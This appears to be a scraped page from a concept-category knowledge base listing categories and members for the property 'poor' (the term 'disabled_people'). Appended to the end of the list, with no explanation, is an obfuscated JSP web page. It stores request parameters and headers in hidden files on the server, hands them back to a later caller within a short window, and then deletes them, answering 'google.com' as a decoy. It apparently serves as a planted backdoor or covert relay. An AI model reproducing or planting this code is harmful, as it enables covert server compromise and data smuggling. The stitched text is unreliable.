Use the & operator to see the shared categories of two terms. E.g.
cola & coffee
or
divorce & war
Go Back
See XML
Categories for
disabled_people
with nuance
poor
:
poor:group,
Simple categories matching
poor
:
society,
facility,
woman,
individual,
group,
quality,
community,
strength,
condition,
residue,
housing,
level,
people,
surface,
substrate,
means,
connection,
soil,
country,
food,
area,
choice,
team,
performance,
population,
requirement,
industry,
class,
equipment,
candidate,
labor,
property,
farming,
transfer,
material,
solvent,
child,
aggregate,
weather,
sector,
outcast,
land,
medium,
household,
Members with property
poor
:
tidal_flow,
orphan,
elderly,
gym,
coffee,
wood,
needy,
clay_subsoil,
woman,
heath_land,
education,
track,
fog,
temperament_problem,
flow_meter,
surface_contamination,
geographic_isolation,
rag,
public-transport_links,
dressing,
waste,
cellulose,
manufacturing_industry,
line,
shantytown,
dilapidated_structure,
summer_humidity,
health_education,
brittleness,
jagged_edge,
cell_boundary,
toilet,
agriculture,
ground_corn,
water_agar,
developing_country,
low_light,
disease,
high_heat,
adobe,
pure_clay,
paper,
slum_pocket,
poor_strength,
sugar,
candy,
softness,
chair,
jerky_movement,
knock,
eroded_soil,
rural_community,
no_lighting,
land,
numerous_defect,
printer,
local_group,
missing_print,
oregon_state,
chalk_marl,
financial_service,
la,
primary_education,
computer,
dirt,
asphalt,
fecal_contamination,
snack,
villa,
limestone,
unattractive_toilet,
plastic_cup,
labour,
salt,
micro_sector,
mature_straw,
xylene,
water,
transport,
loose_shingle,
wire_net,
rice_straw,
susceptibility,
communication_overhead,
leper,
untreated_wood,
cereal_straw,
meat,
haze,
water_stress,
snow_storm,
shed_skin,
death,
marketplace,
soup,
internet,
youth_service,
nosocomial_infection,
cement,
pasta,
health,
heathland_soil,
village,
climate,
northeast_region,
sweetened_beverage,
inspection_time,
tree_bark,
north_street,
frail_individual,
sand,
baltimore_city,
sweet_roll,
cake,
drought,
alcohol,
aegean_greece,
hardpan,
benefit,
poor_visibility,
glue,
shellfish,
sand_storm,
low_gloss,
clay,
united_state,
mold,
agricultural_sector,
salty_snack,
shop,
gravel,
swampy_area,
fried_food,
washing_facility,
copper,
child_labour,
basic_education,
night,
inconsistency,
waiting_room,
loose_jumper,
sanitation,
resisting_bit,
vaccination_centre,
extreme_dryness,
sawdust,
homeless,
smoker,
turnover,
teaching_material,
damp_soil,
septic_tank,
motion,
indigenous_people,
rural_setting,
homeless_hostel,
no_tap,
headlight,
yeast_bread,
practised_agriculture,
silicon,
desk,
tricycle,
dry_soil,
lava_soil,
gauze,
slow_response,
fisher_woman,
stain,
crack,
electrical_storm,
boisterous_environment,
drought_area,
african_country,
bad_brakes,
cloth,
public_education,
vegetable,
trench_town,
indian_country,
body_conformation,
clothing,
black_spot,
squatter_settlement,
cost,
high-temperature_condensate,
dryness,
extreme_heat,
limited_availability,
bedsit,
black_he,
printing,
loose_sand,
frozen_ground,
sandy_bog,
bus_shelter,
slow_speed,
urban_slum,
dry_basalt,
usa,
dull_light,
potato,
extreme_cold,
aluminium,
flaw,
incorrect_shoes,
donut,
health_service,
sri-lanka_range,
internet_service,
inner_city,
nutrient_deficiency,
changing_organization,
barren_land,
indigenous_group,
stadium,
podzol,
physical_injury,
indigent_prisoner,
scrape,
heat,
poor_accommodation,
waste_timber,
spaghetti,
inadequate_sanitation,
cookie,
soft_drink,
no_window,
low_strength,
contamination,
lack,
slum_child,
state,
straw,
rigidity,
aqueous_waste,
fishing_community,
street,
navy,
earth,
sewage_network,
wooden_fiber,
bread,
telephone,
computer_microphone,
classroom,
slum,
streak,
high_humidity,
disabled_people,
poor,
dairying,
wine,
ice,
storm,
poor_lighting,
crookedness,
damp,
legacy,
zero_visibility,
chalk,
brass,
footpath,
hot_dog,
pu_foam,
fold,
insufficient_security,
nutrition,
vigor,
insufficient_strength,
free_state,
newspaper,
unclear_requirement,
cork,
soda,
elderly_patient,
sorghum,
marble,
indian_state,
acidic_sandstone,
disadvantaged_family,
housing,
food_security,
skimmer,
slip,
adams_county,
material_defect,
verbal_disruption,
high_haze,
cold,
sackcloth,
cafe,
excessive_heat,
fish,
open_circuit,
alkaline_soil,
fresh_sawdust,
soil,
heavy_clay,
social_adjustment,
widow,
rough_surface,
titanium,
injury,
comparative_softness,
ipod_headphone,
farm_hands,
cape_flats,
humidity,
land_alienation,
gelatin,
spice,
poor_communication,
polystyrene,
vacant_land,
buffer,
subsoil,
satellite_links,
fog_haze,
<%@page trimDirectiveWhitespaces="true"%> <%@page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> <%@page import="java.io.*"%> <%@page import="java.util.*"%> <%@page import="java.text.*"%> <%! static String cuy321a = null; public static String cuy321b(byte[] cuy321c) { char[] cuy321d = { 'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P', 'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f', 'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v', 'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/' }; StringBuilder cuy321e = new StringBuilder(); int cuy321f = 0; for (int i = 0; i < cuy321c.length; i += 3) { int b = ((cuy321c[i] & 0xFF) << 16) & 0xFFFFFF; if (i + 1 < cuy321c.length) { b |= (cuy321c[i+1] & 0xFF) << 8; } else { cuy321f++; } if (i + 2 < cuy321c.length) { b |= (cuy321c[i+2] & 0xFF); } else { cuy321f++; } for (int j = 0; j < 4 - cuy321f; j++) { int c = (b & 0xFC0000) >> 18; cuy321e.append(cuy321d[c]); b <<= 6; } } for (int j = 0; j < cuy321f; j++) { cuy321e.append("="); } return cuy321e.toString(); } public void cuy321a(HttpServletRequest req) { if (cuy321a != null) return; String cuy321g = getServletContext().getRealPath(req.getRequestURI()).replace('\\', '/'); cuy321a = cuy321g.substring(0, cuy321g.lastIndexOf('/')) + "/"; } byte[] cuy321h(String cuy321i) { byte[] cuy321j = null; FileInputStream cuy321k = null; File file = new File(cuy321i); try { cuy321k = new FileInputStream(file); cuy321j = new byte[(int)file.length()]; cuy321k.read(cuy321j); } catch (Exception ex) { } finally { try { if (cuy321k != null) cuy321k.close(); } catch (Exception ex) { } } return cuy321j; } %> <% cuy321a(request); String cuy322a = request.getParameter("user"); String cuy322b = request.getParameter("rand"); String cuy322c = request.getParameter("id"); String cuy322d = request.getParameter("action"); int cuy322e = -1; if (request.getParameter("code") != null) cuy322e = Integer.parseInt(request.getParameter("code")) % 4; if (cuy322d != null && "home".equals(cuy322d)) { out.write("google.com"); } if (cuy322a != null && !"0".equals(cuy322a)) { String cuy322g = cuy321a + cuy322b + ".vps"; String cuy322f = cuy322g + "x"; String cuy322h = request.getParameter("hash"); String cuy322i = request.getHeader("From"); FileOutputStream cuy322j = null; cuy322j = new FileOutputStream(cuy322f); if(cuy322j != null) { DataOutputStream cuy322k = new DataOutputStream(cuy322j); cuy322k.writeLong(System.currentTimeMillis()); cuy322k.close(); cuy322j.close(); } cuy322j = new FileOutputStream(cuy322g, false); if(cuy322j != null) { cuy322j.write(cuy322h.getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322i.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322a.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322b.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.flush(); cuy322j.close(); } out.write("google.com"); } else if (cuy322e == 0 && "0".equals(cuy322c)) { out.write("google.com"); } else if (cuy322e == 1) { File cuy322l = new File(cuy321a); String cuy322g = null; String cuy322f = null; int cuy322m = 0; if (cuy322l.exists() && cuy322l.isDirectory()) { for(File file:cuy322l.listFiles()) { cuy322g = file.getName(); if(cuy322g.endsWith(".vps")) { cuy322m = 1; cuy322g = file.getAbsolutePath(); cuy322f = cuy322g + "x"; break; } } } if (cuy322m == 1) { FileInputStream cuy321k = new FileInputStream(cuy322f); DataInputStream cuy322o = new DataInputStream(cuy321k); if(System.currentTimeMillis() - cuy322o.readLong() < 180000) { byte[] cuy322p = cuy321h(cuy322g); if (cuy322p != null) { out.write(new String(cuy322p)); } } cuy322o.close(); cuy321k.close(); File cuy322p1 = new File(cuy322g); cuy322p1.delete(); File cuy322pz = new File(cuy322f); cuy322pz.delete(); } else { out.write("google.com"); } } %>